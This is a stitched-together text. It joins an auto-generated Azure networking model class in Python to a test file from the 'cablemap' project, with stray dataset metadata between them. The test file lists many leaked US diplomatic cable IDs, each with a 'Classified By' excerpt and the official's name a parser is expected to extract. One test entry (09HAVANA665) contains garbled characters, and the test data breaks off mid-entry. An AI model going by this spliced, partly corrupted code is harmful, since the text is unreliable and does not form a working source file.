# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TopologyAssociation(Model):
"""Resources that have an association with the parent resource.
:param name: The name of the resource that is associated with the parent
resource.
:type name: str
:param resource_id: The ID of the resource that is associated with the
parent resource.
:type resource_id: str
:param association_type: The association type of the child resource to the
parent resource. Possible values include: 'Associated', 'Contains'
:type association_type: str or
~azure.mgmt.network.v2017_03_01.models.AssociationType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'association_type': {'key': 'associationType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(TopologyAssociation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.resource_id = kwargs.get('resource_id', None)
self.association_type = kwargs.get('association_type', None)
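# Illustrative construction (hypothetical values, not part of the generated
# model):
#
#   assoc = TopologyAssociation(name='nic-1',
#                               resource_id='/subscriptions/xxx/nic-1',
#                               association_type='Associated')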
|
mit
| -3,703,639,473,381,361,700
| 38.65
| 78
| 0.612863
| false
| 4.405556
| false
| false
| false
|
heuer/cablemap
|
cablemap.core/tests/test_reader_classified_by.py
|
1
|
39464
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011 - 2015 -- Lars Heuer <heuer[at]semagia.com>
# All rights reserved.
#
# License: BSD, see LICENSE.txt for more details.
#
"""\
Tests classificationist parsing.
:author: Lars Heuer (heuer[at]semagia.com)
:organization: Semagia - <http://www.semagia.com/>
:license: BSD license
"""
from nose.tools import eq_, ok_
from cablemap.core import cable_by_id
from cablemap.core.reader import parse_classified_by
_TEST_DATA = (
(u'10TOKYO397', u'Marc Wall', u'''FIELD
REF: STATE 015541
Classified By: Acting Deputy Chief of Mission Marc Wall for Reasons 1.4
(b) and (d)
¶1. (C) SUM'''),
(u'10GENEVA249', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 231 (SFO-GVA-VIII-088) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) '''),
(u'10GENEVA247', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 245 (SFO-GVA-VIII-086) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) ¶1. (U) This '''),
(u'10UNVIEVIENNA77', u'Glyn T. Davies', u'''\nClassified By: Ambassador Glyn T. Davies for reasons 1.4 b and d '''),
(u'10WARSAW117', u'F. Daniel Sainz', u'''\nClassified By: Political Counselor F. Daniel Sainz for Reasons 1.4 (b) and (d) '''),
(u'10STATE16019', u'Karin L. Look', u'''\nClassified By: Karin L. Look, Acting ASSISTANT SECRETARY, VCI. Reason: 1.4 (b) and (d).'''),
(u'10LILONGWE59', u'Bodde Peter', u'''\nCLASSIFIED BY: Bodde Peter, Ambassador; REASON: 1.4(B) '''),
(u'95ZAGREB4339', u'ROBERT P. FINN', u'''
1. (U) CLASSIFIED BY ROBERT P. FINN, DEPUTY CHIEF OF
MISSION. REASON: 1.5 (D)
'''),
(u'95DAMASCUS5748', u'CHRISTOPHER W.S. ROSS', u'''SUBJECT: HAFIZ AL-ASAD: LAST DEFENDER OF ARABS
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY:
CHRISTOPHER W.S. ROSS, AMBASSADOR. REASON: 1.5 (D) .
2. SUMMAR'''),
(u'95TELAVIV17504', (), u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY SECTION 1.5 (B)
AND (D). NIACT PRECEDENCE BECAUSE OF GOVERNMENT CRISIS IN
ISRAEL.
2. SU'''),
(u'95RIYADH5221', u'THEODORE KATTOUF', u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY DCM
THEODORE KATTOUF - 1.5 B,D.
2. (C)'''),
(u'96ADDISABABA1545', u'JEFFREY JACOBS', u'''
1. (U) CLASSIFIED BY POLOFF JEFFREY JACOBS, 1.5 (D).
2. (C)'''),
(u'96AMMAN2094', u'ROBERT BEECROFT', u'''
1. (U) CLASSIFIED BY CHARGE ROBERT BEECROFT; REASON 1.5 (D).
2. (C) '''),
(u'96STATE86789', u'MARY BETH LEONARD', u'''
1. CLASSIFIED BY AF/C - MARY BETH LEONARD, REASON 1.5
(D). '''),
(u'96NAIROBI6573', u'TIMOTHY CARNEY', u'''
1. CLASSIFIED BY AMBASSADOR TO SUDAN TIMOTHY CARNEY.
REASON 1.5(D).
'''),
(u'96RIYADH2406', u'THEODORE KATTOUF', u'''SUBJECT: CROWN PRINCE ABDULLAH THE DIPLOMAT
1. (U) CLASSIFIED BY CDA THEODORE KATTOUF, REASON 1.5.D.
2. '''),
(u'96RIYADH2696', u'THEODORE KATTOUF', u'''
1. (U) CLASSIFIED BY CHARGE D'AFFAIRES THEODORE
KATTOUF: 1.5 B, D.
'''),
(u'96ISLAMABAD5972', u'THOMAS W. SIMONS, JR.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
'''),
(u'96ISLAMABAD5972', u'Thomas W. Simons, Jr.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
''', True),
(u'96STATE183372', u'LEE 0. COLDREN', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96STATE183372', u'Lee O. Coldren', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
''', True),
(u'96ASHGABAT2612', u'TATIANA C. GFOELLER', u'''
1. (U) CLASSIFIED BY CHARGE TATIANA C. GFOELLER.
REASON: 1.5 D.
'''),
(u'96BOGOTA8773', u'S.K. ABEYTA', u'''
1. CLASSIFIED BY POL/ECONOFF. S.K. ABEYTA. REASON: 1.5(D)
'''),
(u'96STATE194868', u'E. GIBSON LANPHER, JR.', u'''
1. (U) CLASSIFIED BY E. GIBSON LANPHER, JR., ACTING
ASSISTANT SECRETARY OF STATE FOR SOUTH ASIAN AFFAIRS,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96JAKARTA7841', u'ED MCWILLIAMS', u'''
1. (U) CLASSIFIED BY POL COUNSELOR ED MCWILLIAMS;
REASON 1.5(D)
'''),
(u'96JERUSALEM3094', u'EDWARD G. ABINGTON, JR.', u'''
1. CLASSIFIED BY CONSUL GENERAL EDWARD G. ABINGTON, JR. REASON
1.5 (B) AND (D).
'''),
(u'96BOGOTA10967', u'S.K. ABEYTA', u'''
1. (U) CLASSIFIED BY POL/ECONOFF S.K. ABEYTA. REASON 1.5(D).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
''', True),
(u'05OTTAWA1975', u'Patricia Kim-Scott', u'''
Classified By: Pol/Mil Officer Patricia Kim-Scott. Reason E.O. 12958,
1.4 (b) and (d).
'''),
(u'05BOGOTA6208', u'William B. Wood', u'''
Classified By: Ambassador William B. Wood; reasons 1.4
(b) and (d)
'''),
(u'05TAIPEI2839', u'Douglas Paal', u'''
Classified By: AIT Director Douglas Paal, Reason(s): 1.4 (B/D).
'''),
(u'05DHAKA3073', u'D.C. McCullough', u'''
Classified By: A/DCM D.C. McCullough, reason para 1.4 (b)
'''),
(u'09NAIROBI1132', u'Jessica Davis Ba', u'''
Classified By: Pol/Econ Officer Jessica Davis Ba for reasons 1.4(b) and
(d)
'''),
(u'08ROME1541', u'Liz Dibble', u'''
Classified By: Classified by DCM Liz Dibble for reasons 1.4 (b) and
(d).
'''),
(u'06BAGHDAD2082', u'DANIEL SPECKHARD', ur'''
Classified By: CHARGE D\'AFFAIRES DANIEL SPECKHARD FOR REASONS 1.4 (A),
(B) AND (D)
'''),
(u'05ANKARA4653', u'Nancy McEldowney', u'''
Classified By: (U) CDA Nancy McEldowney; E.O. 12958, reasons 1.4 (b,d)
'''),
(u'05QUITO2057', u'LARRY L. MEMMOTT', u'''
Classified By: ECON LARRY L. MEMMOTT, REASONS 1.4 (B,D)
'''),
(u'06HONGKONG3559', u'LAURENT CHARBONNET', u'''
CLASSIFIED BY: ACTING DEPUTY PRINCIPAL OFFICER LAURENT CHARBONNET. REA
SONS: 1.4 (B,D)
'''),
(u'09BAGHDAD791', u'Patricia Butenis', u'''
Classified By: Charge d\' Affairs Patricia Butenis for reasons 1.4 (b) a
nd (d)
'''),
(u'06OSLO19', u'Christopher W. Webster', u'''
Classified By: Charge d\'Affaires a.i. Christopher W. Webster,
reason 1.4 (b) and (d)
'''),
(u'08BEIJING3386', u'Aubrey Carlson', u'''
Classified By: Political Section Minister Counselor Aubrey Carlson. Re
asons 1.4 (b/d).
'''),
(u'09MOSCOW2393', u'Susan M. Elliott', u'''
Classified By: Political Minister Counselor Susan M. Elliott for reason
s: 1.4 (b), (d).
'''),
(u'10BRUSSELS66', u'Christopher R. Davis', u'''
Classified By: Political Minister-Counselor Christopher R. Davis for re
ason 1.4 (b/d)
'''),
(u'06BEIJING22125', u'ROBERT LUKE', u'''
Classified By: (C) CLASSIFIED BY MINISTER COUNSELOR FOR ECONOMIC AFFAIR
S ROBERT LUKE; REASON 1.4 (B) AND (D).
'''),
(u'07CAIRO622', u'William R. Stewart', u'''
Classified by: Minister Counselor for Economic and
Political Affairs William R. Stewart for reasons 1.4(b) and
(d).
'''),
(u'07BAGHDAD1188', u'Daniel Speckhard', u'''
Classified By: Charge Affaires Daniel Speckhard. Reasons: 1.4 (b) and
(d).
'''),
(u'08PARIS1131', u'STUART DWYER', u'''
Classified By: ECONCOUNS STUART DWYER FOR REASONS 1.4 B AND D
'''),
(u'08ATHENS985', u'Jeff Hovenier', u'''
Classified By: A/Political Counselor Jeff Hovenier for
1.4 (b) and (d)
'''),
(u'09BEIJING2690', u'William Weinstein', u'''
Classified By: This message classified by Econ Minister Counselor
William Weinstein for reasons 1.4 (b), (d) and (e).
'''),
(u'06VILNIUS945', u'Rebecca Dunham', u'''
Classified By: Political and Economic Section Chief Rebecca Dunham for
reasons 1.4 (b) and (d)
'''),
(u'07BAGHDAD2781', u'Howard Keegan', u'''
Classified By: Kirkuk PRT Team Leader Howard Keegan for reason 1.4 (b)
and(d).
'''),
(u'09HARARE864', u'Donald Petterson', u'''
Classified By: Charge d\'affaires, a.i. Donald Petterson for reason 1.4
(b).
'''),
(u'04MANAMA525', u'Robert S. Ford', u'''
Classified By: Charge de Affaires Robert S. Ford for reasons
1.4 (b) and (d).
'''),
(u'08STATE56778', u'Patricia A. McNerney', u'''
Classified By: ISN Acting Assistant Secretary
Patricia A. McNerney, Reasons 1.4 b, c, and d
'''),
(u'07BRUSSELS1462', u'Larry Wohlers', u'''
Classified By: USEU Political Minister Counselor Larry Wohlers
for reasons 1.4 (b) and (d).
'''),
(u'09KABUL2261', u'Hoyt Yee', u'''
Classified By: Interagency Provincial Affairs Deputy Coordinator Hoyt Y
ee for reasons 1.4 (b) and (d)
'''),
(u'09KABUL1233', u'Patricia A McNerney', u'''
Classified By: PRT and Sub-National Governance Acting Director Patricia
A McNerney for reasons 1.4 (b) and (d)
'''),
(u'09BRUSSELS1288', u'CHRISTOPHER DAVIS', u'''
Classified By: CLASSIFIED BY USEU MCOUNSELOR CHRISTOPHER DAVIS, FOR REA
SONS 1.4 (B) AND (D)
'''),
(u'06TAIPEI3165', u'Stephen M. Young', u'''
Classified By: Classified by AIT DIR Stephen M. Young.
Reasons: 1.4 b, d.
'''),
(u'07BRUSSELS1208', u'Courtney Nemroff', u'''
Classified By: Institutional Affairs Unit Chief Courtney Nemroff for re
asons 1.4 (b) & (d)
'''),
(u'05CAIRO8602', u'Michael Corbin', u'''
Classified by ECPO Minister-Counselour Michael Corbin for
reasons 1.4 (b) and (d).
'''),
(u'09MADRID1210', u'Arnold A. Chacon', u'''
Classified By: Charge d'Affaires, a.i., Arnold A. Chacon
1.(C) Summary: In his meetings with Spanish officials,
Special Envoy for Eurasian Energy'''),
(u'05SINGAPORE887', u'Laurent Charbonnet', u'''
Classified By: E/P Counselor Laurent Charbonnet, Reasons 1.4(b)(d)
'''),
(u'09SINGAPORE677', u'Dan Jassem', u'''
Classified By: Acting E/P Counselor Dan Jassem for reasons 1.4 (b) and
(d)
'''),
(u'08BELGRADE1189', u'Thatcher Scharpf', u'''
Classified By: Acting Deputy Chief of Mission Thatcher Scharpf for reas
ons 1.4(b/d).
'''),
(u'09BAGHDAD3319', u'Rachna Korhonen', u'''
Classified By: PRT Kirkuk Governance Section Head Rachna Korhonen for r
easons 1.4 (b) and (d).
'''),
(u'04ANKARA5897', u'Thomas Goldberger', u'''
Classified By: (U) Classified by Economic Counselor Thomas Goldberger f
or reasons 1.4 b,d.
'''),
(u'00HARARE3759', u'TOM MCDONALD', u'''
CLASSIFIED BY AMBASSADOR TOM MCDONALD.
CONFIDENTIAL
PAGE 02 HARARE 03759 01 OF 03 111533Z
REASONS: 1.5 (B) AND (D).
1. (C) SUMMARY: ALTHOUGH WIDESPREAD FEARS OF A
SPIKE'''),
(u'07STATE156455', u'Glyn T. Davies', u'''
Classified By: Glyn T. Davies
SUMMARY
-------
'''),
(u'03GUATEMALA1727', u'Erik Hall', u'''
Classified By: Labor Attache Erik Hall. Reason 1.5 (d).
'''),
(u'05VILNIUS503', u'LARRY BEISEL', u'''
Classified By: DEFENSE ATTACHE LTC LARRY BEISEL FOR REASONS 1.4 (B) AND
(D).
'''),
(u'08USUNNEWYORK729', u'Carolyn L. Willson', u'''
Classified By: USUN Legal Adviser Carolyn L. Willson, for reasons
1.4(b) and (d)
'''),
(u'04BRUSSELS4688', u'Jeremy Brenner', u'''
Classified By: USEU polmil officer Jeremy Brenner for reasons 1.4 (b) a
nd (d)
'''),
(u'08GUATEMALA1416', u'Drew G. Blakeney', u'''
Classified By: Pol/Econ Couns Drew G. Blakeney for reasons 1.4 (b&d).
'''),
(u'08STATE77798', u'Brian H. Hook', u'''
Classified By: IO Acting A/S Brian H. Hook, E.O. 12958,
Reasons: 1.4(b) and (d)
'''),
(u'05ANKARA1071', u'Margaret H. Nardi', u'''
Classified By: Acting Counselor for Political-Military Affiars Margaret
H. Nardi for reasons 1.4 (b) and (d).
'''),
(u'08MOSCOW3655', u'David Kostelancik', u'''
Classified By: Deputy Political M/C David Kostelancik. Reasons 1.4 (b)
and (d).
'''),
(u'09STATE75025', u'Richard C. Holbrooke', u'''
Classified By: Special Representative for Afghanistan and Pakistan
Richard C. Holbrooke
1. (U) This is an action request; see paragraph 4.
'''),
(u'10KABUL688', u'Joseph Mussomeli', u'''
Classified By: Assistant Chief of Mission Joseph Mussomeli for Reasons
1.4 (b) and (d)
'''),
(u'98USUNNEWYORK1638', u'HOWARD STOFFER', u'''
CLASSIFIED BY DEPUTY POLITICAL COUNSEL0R HOWARD STOFFER
PER 1.5 (B) AND (D). ACTION REQUEST IN PARA 10 BELOW.
'''),
(u'02ROME3119', u'PIERRE-RICHARD PROSPER', u'''
CLASSIFIED BY: AMBASSADOR-AT-LARGE PIERRE-RICHARD PROSPER
FOR REASONS 1.5 (B) AND (D)
'''),
(u'02ANKARA8447', u'Greta C. Holtz', u'''
Classified by Consul Greta C. Holtz for reasons 1.5 (b) & (d).
'''),
(u'09USUNNEWYORK282', u'SUSAN RICE', u'''
Classified By: U.S. PERMANENT REPRESENATIVE AMBASSADOR SUSAN RICE
FOR REASONS 1.4 B/D
'''),
(u'09DHAKA339', u'Geeta Pasi', u'''
Classified By: Charge d'Affaires, a.i. Geeta Pasi. Reasons 1.4 (b) and
(d)
'''),
(u'06USUNNEWYORK2273', u'Alejandro D. Wolff', u'''
Classified By: Acting Permanent Representative Alejandro D. Wolff
per reasons 1.4 (b) and (d)
'''),
(u'08ISLAMABAD1494', u'Anne W. Patterson', u'''
Classified By: Ambassador Anne W. Patterson for reaons 1.4 (b) and (d).
1. (C) Summary: During'''),
(u'08BERLIN1150', u'Robert Pollard', u'''
Classified By: Classified by Economic Minister-Counsellor
Robert Pollard for reasons 1.4 (b) and (d)
'''),
(u'08STATE104902', u'DAVID WELCH', u'''
Classified By: 1. CLASSIFIED BY NEA ASSISTANT SECRETARY DAVID WELCH
REASONS: 1.4 (B) AND (D)
'''),
(u'07VIENTIANE454', u'Mary Grace McGeehan', u'''
Classified By: Charge de'Affairs ai. Mary Grace McGeehan for reasons 1.
4 (b) and (d)
'''),
(u'07ROME1948', u'William Meara', u'''
Classified By: Acting Ecmin William Meara for reasons 1.4 (b) and (d)
'''),
(u'07USUNNEWYORK545', u'Jackie Sanders', u'''
Classified By: Amb. Jackie Sanders. E.O 12958. Reasons 1.4 (B&D).
'''),
(u'06USOSCE113', u'Bruce Connuck', u'''
Classified By: Classified by Political Counselor Bruce Connuck for Reas
(b) and (d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
''', True),
(u'09RANGOON575', u'Thomas Vajda', u'''
Classified By: Charge d'Afairs (AI) Thomas Vajda for Reasons 1.4 (b) &
(d
'''),
(u'03ROME3107', u'TOM COUNTRYMAN', u'''
Classified By: POL MIN COUN TOM COUNTRYMAN, REASON 1.5(B)&(D).
'''),
(u'06USUNNEWYORK732', u'Molly Phee', u'''
Classified By: Deputy Political Counselor Molly Phee,
for Reasons 1.4 (B and D)
'''),
(u'06BAGHDAD1552', u'David M. Satterfield', u'''
Classified By: Charge d'Affaires David M. Satterfield for reasons 1.4 (
b) and (d)
'''),
(u'06ABUJA232', u'Erin Y. Tariot', u'''
Classified By: USDEL Member Erin Y. Tariot, reasons 1.4 (b,d)
'''),
(u'09ASTANA184', u'RICAHRD E. HOAGLAND', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
'''),
(u'09ASTANA184', u'Richard E. Hoagland', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
''', True),
(u'09CANBERRA428', u'John W. Crowley', u'''
Classified By: Deputy Political Counselor: John W. Crowley, for reasons
1.4 (b) and (d)
'''),
(u'08TASHKENT706', u'Molly Stephenson', u'''
Classified By: Classfied By: IO Molly Stephenson for reasons 1.4 (b) a
nd (d).
'''),
(u'08CONAKRY348', u'T. SCOTT BROWN', u'''
Classified By: ECONOFF T. SCOTT BROWN FOR REASONS 1.4 (B) and (D)
'''),
(u'07STATE125576', u'Margaret McKelvey', u'''
Classified By: PRM/AFR Dir. Margaret McKelvey-reasons 1.4(b/d)
'''),
(u'09BUDAPEST372', u'Steve Weston', u'''
Classified By: Acting Pol/Econ Counselor:Steve Weston,
reasons 1.4 (b and d)
'''),
(u'04TAIPEI3162', u'David J. Keegan', u''''
Classified By: AIT Deputy Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3521', u'David J. Keegan', u'''
Classified By: AIT Acting Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3919', u'David J. Keegan', u'''
Classified By: AIT Director David J. Keegan, Reason 1.4 (B/D)
'''),
(u'08JAKARTA1142', u'Stanley A. Harsha', u'''
Classified By: Acting Pol/C Stanley A. Harsha for reasons 1.4 (b+d).
'''),
(u'06ISLAMABAD16739', u'MARY TOWNSWICK', u'''
Classified By: DOS CLASSIFICATION GUIDE BY MARY TOWNSWICK
1. (C) Summary. With limited government support, Islamic
banking has gained momentum in Pakistan in the past three
years. The State Bank of Pakistan (SBP) reports that the
capital base of the Islamic banking system has more than
doubled since 2003 as the number of Islamic banks operating
in Pakistan rose from one to four. A media analysis of
Islamic banking in Pakistan cites an increase in the number
of conventional banks'''),
(u'05DJIBOUTI802', u'JEFFREY PURSELL', u'''
(U) CLASSIFIED BY TDY RSO JEFFREY PURSELL FOR REASON 1.5 C.
'''),
(u'09STATE82567', u'Eliot Kang', u'''
Classified By: Acting DAS for ISN Eliot Kang. Reasons 1.4 (b) and (d)
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
''', True),
(u'10VIENNA195', u'J. Dean Yap', u'''
Classified by: DCM J. Dean Yap (acting) for reasons 1.4 (b)
and (d).
'''),
(u'03HARARE175', u'JOHN S. DICARLO', u'''
Classified By: RSO - JOHN S. DICARLO. REASON 1.5(D)
'''),
(u'08LONDON2968', u'Greg Berry', u'''
Classified By: PolMinCons Greg Berry, reasons 1.4 (b/d).
'''),
(u'08HAVANA956', u'Jonathan Farrar', u'''
Classified By: COM Jonathan Farrar for reasons 1.5 (b) and (d)
'''),
(u'09BAGHDAD253', u'Robert Ford', u'''
Classified By: Acting Deputy Robert Ford. Reasons 1.4 (b) and (d)
'''),
(u'09TIRANA81', u'JOHN L. WITHERS II', u'''
Classified By: AMBASSADOR JOHN L. WITHERS II FR REASONS 1.4 (b) AND (d
).
'''),
(u'05HARARE383', u'Eric T. Schultz', u'''
Classified By: Charge d'Affaires a.i. Eric T. Schultz under Section 1.4
b/d
'''),
(u'07LISBON2591', u'Jenifer Neidhart', u'''
Classified By: Pol/Econ Off Jenifer Neidhart for reasons 1.4 (b) and (d
)
'''),
(u'07STATE171234', u'Lawrence E. Butler', u'''
Classified By: NEA Lawrence E. Butler for reasons EO 12958
1.4(b),(d), and (e).
'''),
(u'04AMMAN8544', u'David Hale', u'''
Classified By: Charge d'Affaries David Hale for Reasons 1.4 (b), (d)
'''),
(u'07NEWDELHI5334', u'Ted Osius', u'''
Classified By: Acting DCM/Ted Osius for reasons 1.4 (b and d)
'''),
(u'04JAKARTA5072', u'ANTHONY C. WOODS', u'''
Classified By: EST&H OFFICER ANTHONY C. WOODS FOR REASON 1.5 (b, d)
'''),
(u'03AMMAN2822', u'Edward W. Gnehm', u'''
Classified By: Ambassador Edward W. Gnehm. Resons 1.5 (B) and (D)
'''),
(u'08CANBERRA1335', u'Daniel A. Clune', u'''
Classified By: Deputy Chief of Mission: Daniel A. Clune: Reason: 1.4 (c
) and (d)
'''),
(u'09HAVANA665', u'Charles Barclay', u'''
Classified By: CDA: Charles Barclay for reQ#8$UQ8ML#C may choke oQhQGTzovisional\" controls, such as
price caps and limits on the amount any one person could buy.
3. (SBU) Furthering speculation that the private markets
were under the gun, official reports have resurfaced in
recent months accusing private markets of artificially
maintaining higher'''),
(u'08STATE8993', u'Gregory B. Starr', u'''
1. (U) Classified by Acting Assistant Secretary for Diplomatic
Security Gregory B. Starr for E.O. 12958 reasons 1.4 (c) and
(d).
'''),
(u'09ISTANBUL137', u'Sandra Oudkirk', u'''
Classified By: ConGen Istanbul DPO Sandra Oudkirk; Reason 1.5 (d)
'''),
(u'08BANGKOK1778', u'James F. Entwistle', u'''
Classified By: Charge, d,Affaires a. i. James F. Entwistle, reason 1.4
(b) and (d).
'''),
(u'08MANAMA301', u'Christopher Henzel', u'''
Classified By: Charge d,Affaires a.i. Christopher Henzel, reasons 1.4(b
) and (d).
'''),
(u'06COLOMBO123', u'Robert O. Blake, Jr.', u'''
Classified By: Abassador Robert O. Blake, Jr. for reasons
1.4 (b and (d).
'''),
(u'08YEREVAN907', u'Marie Yovanovitch', u'''
Classified By: Amabassador Marie Yovanovitch. Reason 1.4 (B/D)
'''),
(u'09QUITO329', u'Heather M. Hodges', u'''
Classified By: AMB Heather M. Hodges for reason 1.4 (D)
'''),
(u'09STATE38028', (u'KARL WYCOFF', u'SHARI VILLAROSA'), u'''
CLASSIFIED BY AF KARL WYCOFF, ACTING AND S/CT DAS SHARI
VILLAROSA ; E.O. 12958 REASON: 1.4 (B) AND (D)
'''),
(u'04ABUJA2060', u'BRUCE EHRNMAN', u'''
Classified By: AF SPECIAL ADVISOR BRUCE EHRNMAN FOR REASONS 1.5 (B) AND
(D)
'''),
(u'06ISLAMABAD3684', u'RCROCKER', u'''
Classified By: AMB:RCROCKER, Reasons 1.4 (b) and (c)
'''),
(u'06MANAMA184', u'William T.Monroe', u'''
Classified By: Classified by Ambassadior William T.Monroe. Reasons: 1.
4 (b)(d)
'''),
(u'07SANSALVADOR263', u'Charles Glazer', u'''
Classified By: Ambasasdor Charles Glazer, Reasons
1.4 (b) and (d)
'''),
(u'05BRUSSELS1549', u'Michael Ranneberger', u'''
Classified By: AF PDAS Michael Ranneberger. Reasons 1.5 (b) and (d).
'''),
(u'09STATE14163', u'Mark Boulware', u'''
Classified By: AF Acting DAS Mark Boulware, Reasons 1.4 (b) and (d).
'''),
(u'06AITTAIPEI1142', u'Michael R. Wheeler', u'''
Classified By: IPO Michael R. Wheeler for reason 1.4(G)(E)
'''),
(u'08TAIPEI1038', u'Stephen M. Young', u'''
Classified By: AIT Chairman Stephen M. Young,
Reasons: 1.4 (b/d)
'''),
(u'09STATE96519', u'Ellen O. Tauscher', u'''
Classified By: T U/S Ellen O. Tauscher for Reasons 1.4 a,b,and d.
'''),
(u'08NAIROBI232', u'JOHN M. YATES', u'''
Classified By: SPECIAL ENVOY JOHN M. YATES
1. (C) '''),
(u'07COLOMBO769', u'Robert O. Blake, Jr.', u'''
Classified By: Ambassodor Robert O. Blake, Jr. for reasons 1.4 (b, d).
'''),
(u'04DJIBOUTI1541', u'MARGUERITA D. RAGSDALE', u'''
Classified By: AMBASSSADOR MARGUERITA D. RAGSDALE.
REASONS 1.4 (B) AND (D).
'''),
(u'08MOSCOW3202', u'David Kostelancik', u'''
Classified By: Acting Political MC David Kostelancik for reasons 1.4(b)
and (d).
'''),
(u'09BEIJING939', u'Ben Moeling', u'''
Classified By: Acting Political Minister-Couselor
Ben Moeling, reasons 1.4 (b/d).
'''),
(u'09HAVANA689', u'Jonathan Farrar', u'''
Classified By: Principal Office Jonathan Farrar for reasons 1.4 (b) and
(d)
'''),
(u'07VIENNA2687', u'J. Dean Yap', u'''
Classified By: Political Economic Counselr J. Dean Yap for reasons 1.4
(b) and (d)
'''),
(u'08LONDON1485', u'Maura Connelly', u'''
Classified By: Political Minister Counsel Maura Connelly for reasons 1.
4 (b/d).
'''),
(u'07LONDON3228', u'JOHN MCNAMARA', u'''
Classified By: A E/MIN COUNS. JOHN MCNAMARA, REASONS 1.4(B) AND (D)
'''),
(u'05ABUJA2031', u'Rich Verrier', u'''
Classified By: ARSO Rich Verrier for reason 1.4 (d)
'''),
(u'09USOSCE235', u'Chris Ellis', u'''
Classified By: Acting Chief Arms Control Delegate Chris Ellis,
for reasons 1.4(b) and (d).
'''),
(u'06RANGOON1542', u'Walter Parrs III', u'''
Classified By: Conoff Walter Parrs III for Reasons 1.4 (b) and (d)
'''),
(u'08STATE109148', u'Pam Durham', u'''
Classified By: ISN/MTR Direcotr Pam Durham.
Reason: 1.4 (B), (D).
'''),
(u'08STATE3581', u'AFriedt', u'''
Classified By: EUR/PRA, Dir. AFriedt, Reason 1.4 (b/d)
'''),
(u'06HONGKONG3109', u'JEFF ZAISER', u'''
CLASSIFIED BY: ACTING E/P CIEF JEFF ZAISER. REASONS: 1.4(B,D).
'''),
(u'07LAPAZ123', u'Brian Quigley', u'''
Classified By: Acting Ecopol Councilor Brian Quigley for reasons 1.4 (d
) and (e).
'''),
(u'08BAGHDAD3818', u'Michael Dodman', u'''
Classified By: A/EMIN Michael Dodman, Reasons 1.4 (b,d).
'''),
(u'09BAGHDAD565', u'Michael Dodman', u'''
Classified By: Acting EMIN Michael Dodman, reasons 1.4 (b,d).
'''),
(u'09BUDAPEST198', u'Jon Martinson', u'''
Classified By: Acting P/E Counseor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'09BUDAPEST276', u'Jon Martinson', u'''
Classified By: Acting P/E Counsleor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'08STATE67468', u'George Krol', u'''
Classified By: SCA/DAS for Central Asia George Krol
1. (C) '''),
(u'09STATE24316', u'GEORGE KROL', u'''
Classified By: DEPUTY ASSISTANT SECRETARY OF STATE FOR
CENTRAL ASIA GEORGE KROL FOR REASONS 1.4 (B) AND (D)
'''),
(u'08STATE82744', u'BRIAN HOOK', u'''
Classified By: CLASSIFIED BY IO A/S ACTING BRIAN HOOK
FOR REASONS 1.4(B) AND (D).
'''),
(u'09SINGAPORE773', u'Daniel Shields', u'''
Classified By: Charge d'Affaires (CDA) Daniel Shields for Reasons 1.4 (
b/b)
'''),
(u'07ASHGABAT350', u'Richard Hoagland', u'''
Classified By: Classified by Acting Charge d\'Affaires, Ambassador Richa
rd Hoagland, for reasons 1.4(B) and (D).
'''),
(u'05NEWDELHI8162', u'Bob Blake', u'''
Classified By: Charge' Bob Blake for Reasons 1.4 (B, D)
'''),
(u'07RIYADH1028', u'BOB SILVERMAN', u'''
Classified By: ECONOMIC COUNSELOR BOB SILVERMAN
FOR 12958 1.4 B, D, AND E
'''),
(u'05ROME3781', u'ANNA BORG', u'''
Classified By: DCM ANNA BORG BASED ON E.O.12958 REASONS 1.4 (b) and (d)
'''),
(u'09STATE2508', u'PATRICIA A. MCNERNEA', u'''
